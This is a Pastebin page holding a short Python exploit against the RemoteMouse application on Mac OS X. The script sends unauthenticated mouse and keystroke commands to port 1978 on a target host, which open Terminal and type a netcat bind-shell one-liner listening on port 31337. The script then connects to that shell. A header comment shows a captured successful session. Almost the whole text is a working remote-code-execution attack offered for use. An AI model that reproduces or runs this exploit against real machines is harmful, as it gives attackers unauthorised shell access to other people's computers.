Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # Remote exploit against remotemouse (www.remotemouse.net)
- #
- # Launches a remote shell on macosx leopard
- #
- # Aris Adamantiadis <[email protected]>
- #
- # aris@darkforce:~/synchronized/hack/remotemouse$ python hackmac.py
- # enjoy your shell !!
- # Connection to 192.168.1.3 31337 port [tcp/*] succeeded!
- # sh: no job control in this shell
- # aris@aris-laptop:~$ id
- # id
- # uid=501(aris) gid=20(staff) groups=20(staff),402(com.apple.sharepoint.group.1),401(com.apple.access_screensharing),204(_developer),100(_lpoperator),98(_lpadmin),81(_appserveradm),80(admin),79(_appserverusr),61(localaccounts),12(everyone),501(access_bpf)
- # aris@aris-laptop:~$ exit
- import time
- import socket
- import os
- right = "mos 6m 9 0"
- up = "mos 6m 0 -9"
- diag = "mos 6m 9 -9"
- fineup = "mos 6m 0 -1"
- fineright = "mos 6m 1 0"
- key = "key1 "
- click = "mos 5R l d" + "mos 5R l u"
- host = "192.168.1.3"
- shellcode = "while true ; do rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -l 31337 >/tmp/f ; done&clear;exit"
- def keys(v):
- f=""
- for i in v:
- f+= key + i
- return f
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((host,1978))
- s.send(up * 200 + right * 400 + fineup * 9 + fineright *9)
- s.close()
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- time.sleep(1)
- s.connect((host,1978))
- s.send(click)
- time.sleep(1)
- s.send(keys("terminal"))
- time.sleep(.5)
- s.send("key3 RTN")
- time.sleep(.5)
- s.send(keys(shellcode))
- time.sleep(.5)
- s.send("key3 RTN")
- time.sleep(.5)
- s.close()
- print "enjoy your shell !!"
- os.system("nc -v " + host + " 31337")
Advertisement
Add Comment
Please, Sign In to add comment
